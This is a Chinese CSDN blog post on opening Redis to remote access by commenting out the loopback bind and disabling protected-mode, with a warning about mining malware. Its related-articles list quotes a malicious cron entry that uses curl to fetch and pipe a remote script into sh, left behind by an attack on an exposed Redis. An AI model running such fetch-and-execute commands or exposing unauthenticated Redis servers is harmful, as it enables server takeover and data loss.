【警告!可能会引起安全漏洞】redis设置外网访问权限

最新推荐文章于 2024-05-30 21:48:09 发布
最新推荐文章于 2024-05-30 21:48:09 发布
阅读量924 收藏
点赞数
分类专栏: DB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sirria1/article/details/107229952
版权

redis默认是关闭外网访问的,只有局域网内部才可以访问。要开启外网访问,只需要修改配置文件redis.conf文件里的protected-mode从yes改为no,并把bind 127.0.0.1注释掉即可。

# instance to everybody on the internet. So by default we uncomment the
# following bind directive, that will force Redis to listen only into
# the IPv4 loopback interface address (this means Redis will be able to
# accept connections only from clients running into the same computer it
# is running).
#
# IF YOU ARE SURE YOU WANT YOUR INSTANCE TO LISTEN TO ALL THE INTERFACES
# JUST COMMENT THE FOLLOWING LINE.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# bind 127.0.0.1

# Protected mode is a layer of security protection, in order to avoid that
# Redis instances left open on the internet are accessed and exploited.
#
# When protected mode is on and if:
#
# 1) The server is not binding explicitly to a set of addresses using the
#    "bind" directive.
# 2) No password is configured.
#
# The server only accepts connections from clients connecting from the
# IPv4 and IPv6 loopback addresses 127.0.0.1 and ::1, and from Unix domain
# sockets.
#
# By default protected mode is enabled. You should disable it only if
# you are sure you want clients from other hosts to connect to Redis
# even if no authentication is configured, nor a specific set of interfaces
# are explicitly listed using the "bind" directive.
protected-mode no

# Accept connections on the specified port, default is 6379 (IANA #815344).
# If port 0 is specified Redis will not listen on a TCP socket.
port 6379

# TCP listen() backlog.
#
# In high requests-per-second environments you need an high backlog in order
# to avoid slow clients connections issues. Note that the Linux kernel
# will silently truncate it to the value of /proc/sys/net/core/somaxconn so
# make sure to raise both the value of somaxconn and tcp_max_syn_backlog
# in order to get the desired effect.
tcp-backlog 511

然后将redis服务器重启。

警告:redis开启外网访问权限后,很容易会被限制流行的挖矿病毒感染,建议不要随便开启。

sirria1
关注
专栏目录
redis密码设置访问权限控制等安全设置
09-10
主要介绍了redis密码设置访问权限控制等安全设置,需要的朋友可以参考下
redis 远程连接问题
jiewenike的专栏
03-04 513
redis 配置 bind  绑定允许访问的ip 和端口 By default protected mode is enabled. You should disable it only if # you are sure you want clients from other hosts to connect to Redis # even if no authent
Redis被攻击(Redis安全性)
Beyonderwei的博客
10-28 2288
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
RedisProtected Mode 解读
RAB
04-26 3467
RedisProtected Mode 解读。
宝塔 开启Redis外网访问权限
php菜鸟技术天地
12-14 1943
把127.0.0.1改为0.0.0.0 正式环境,一定要绑定服务器IP访问,就是不开放外网访问 警告:请勿开启Redis外网访问权限,未限制访问IP的情况下极大概率导致服务器被入侵。
redis 允许外网访问
最新发布
志存高远
05-30 2657
允许Redis公开在网络上可访问带来严重的安全风险,因为Redis默认没有密码认证。除非绝对必要,否则不建议这样做。如果必须开放外网访问,务必实施额外的安全措施,如设置强密码、使用SSL/TLS加密连接、配置网络访问控制列表(ACLs)或使用安全隧道(如SSH隧道)。
Redis设置外网访问
01-07
第一步:将Reids开放端口添加到防火墙计划中 ...redis默认安装只能本机连接,外网无法使用 第三步:修改redis.conf配置 bind 0.0.0.0 #允许所有ip连接redis #protected-mode no #注释redis保护模式 requir
redis外网安装
01-18
在无外网环境下安装Redis是一项常见的任务,尤其是在服务器或隔离网络中。Redis是一款高性能的键值存储系统,常用于数据库、缓存和消息中间件。本文将详细介绍在没有互联网连接的情况下如何顺利完成Redis的安装。 ...
关于Redis未授权访问漏洞利用的介绍与修复建议
09-09
然而,Redis的一个常见安全问题在于其默认配置可能导致未授权访问漏洞,这允许任何能够访问服务器的用户无需认证即可读取或篡改Redis数据。 **一、漏洞介绍** 默认情况下,Redis绑定在0.0.0.0:6379,这意味着它...
Redis篇之设置外网可访问redis的方法
热门推荐
m0_67394006的博客
08-24 1万+
2、如果你的服务器开启了防火墙策略,此时需要配置防火墙,开放对应的redis端口,该端口为你启动的redis配置文件中对应的端口号。如果是你通过yum安装的redis,则redis的默认配置文件为:/etc/redis/redis.conf。在Redis3.2版本之后新增了protected-mode 配置,默认是yes,即为开启。当我们在部署了redis服务之后,redis本身默认只允许本地访问。1、找到自己服务器中redis的配置文件redis.conf 文件。3、重启redis服务。
解决远程连接不上Linux下的redis
weixin_44825912的博客
08-12 480
要使Redis可以用以实现外网访问,首先要登录到Redis服务器,然后打开Redis的配置文件(redis.conf),将bind(绑定)地址设置为0.0.0.0,表示Redis可以允许外网访问。最后重启redis,即可远程连接访问。requirepas 密码。
关于redis外网被攻击
a13627210064的博客
06-09 646
总结记录一下,今天遇见的一个问题。 在测试服务器的redis服务需要开通外网访问。 然后在开通外网访问之后没有限制访问ip(这里是大坑)。 然后被黑客给攻击了。 黑客通过redis运行命令插入了条wget命令,获取他自己写的sh脚本通过sbin/sh来运行他的脚本(copy数据库及一些关键的资料)。 查看了ip。195.3.146.118 特么还是代理的个国外的ip。 最后解决方案。 先关闭了redis的服务。然后先想着杀他的进程。 结果发现这小子循环执行wget一直在运行他的sh脚本。 然后做了一件蠢事-
Redis--提高外网访问的安全性
IT利刃出鞘的博客
08-18 1323
本文介绍如何提高Redis在公网可访问时的安全性。 Redis若暴露在公网(公网可访问),则容易受到攻击。一般情况下,尽量配置Redis只允许内网访问,但有时需要使Redis可公网访问,比如:应用部署在不同的服务器,都要用这个Redis。.........
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4397
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,绑定在 0.0.0.0:6379,这样将将 Red
Redis 宝塔面板配置外网远程连接
高艳艳的博客!
11-08 3776
Redis 宝塔面板配置外网远程连接
宝塔 redis 除本机外 局域网内其他ip无法访问、连接超时、连接失败的解决方法及原因
hellozhuzhuye的博客
07-20 3727
宝塔 redis 除本机外 局域网内其他ip无法访问、连接超时、连接失败的解决方法及原因
Centos或者使用宝塔面板直接安装的redis不能外网访问的问题
qq_37533576的博客
07-14 1239
使用宝塔面板安装的Redis内网能正常访问,外网怎么样都连不上,可以到redis的配置里里吧bind 127.0.0.1注释掉,或者改为bind 0.0.0.0,然后也要将redis对应的端口放行,默认应该是6379 在CentOs直接安装redis可能存在一样的问题,解决流程大致如下 在redis.conf中将bind 127.0.0.1注释掉,或者改为bind 0.0.0.0 执行命令打开6379端口防火墙,看到success字样就表明添加成功 firewall-cmd --zone=pu
Redis--设置外部(公网)可以访问
IT利刃出鞘的博客
08-18 6891
本文介绍如何将Redis设置外网可以访问。 默认情况下,Redis服务端只允许它所在服务器上的客户端访问,如果Redis服务端和Redis客户端不在同一个机器上,就要进行配置。
Redis常用配置解析
大道至简
09-26 233
主机访问权限 如果不设置限制,直接把这一行注释掉即可; # By default, if no "bind" configuration directive is specified, Redis listens # for connections from all the network interfaces available on the server. # It is possible t...
linux安装redis设置外网访问
08-29
要在Linux上设置Redis允许外部访问,你可以按照以下步骤进行操作: 1. 首先,修改Redis配置文件(redis.conf)。你可以使用命令`vi /usr/local/redis/redis.conf`打开配置文件。 2. 在配置文件中,找到并修改`bind`项的值。将其从默认值`127.0.0.1`改为`0.0.0.0`。这样Redis监听所有可用的网络接口,允许外部访问。 3. 同时,你可以为Redis设置访问密码。在配置文件中找到并取消注释`#requirepass foobared`这一行,并将`foobared`替换为你想要设置的密码。 4. 保存并关闭配置文件。 5. 接下来,你需要确保服务器的防火墙不阻止Redis的入站连接。你可以关闭防火墙或者修改防火墙配置开放Redis的端口(默认为6379)。 6. 重新启动Redis服务,以应用配置的更改。你可以使用命令`service redis restart`或者`systemctl restart redis`来重启Redis服务。 7. 最后,你可以通过使用telnet命令测试连接到Redis。使用命令`telnet <Redis服务器IP> 6379`,将`<Redis服务器IP>`替换为你的实际IP地址。如果成功连接,你将看到Redis的欢迎信息。 通过按照上述步骤进行操作,你就可以在Linux上设置Redis允许外部访问了。请注意,为了安全起见,你应该使用强密码来保护你的Redis实例,并确保只有受信任的客户端可以访问。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [解决linux环境安装redis外网访问遇到的坑](https://blog.csdn.net/abcdf123456er/article/details/105253489)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Linux安装redis设置外网可以访问](https://blog.csdn.net/qq_24831411/article/details/84938452)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值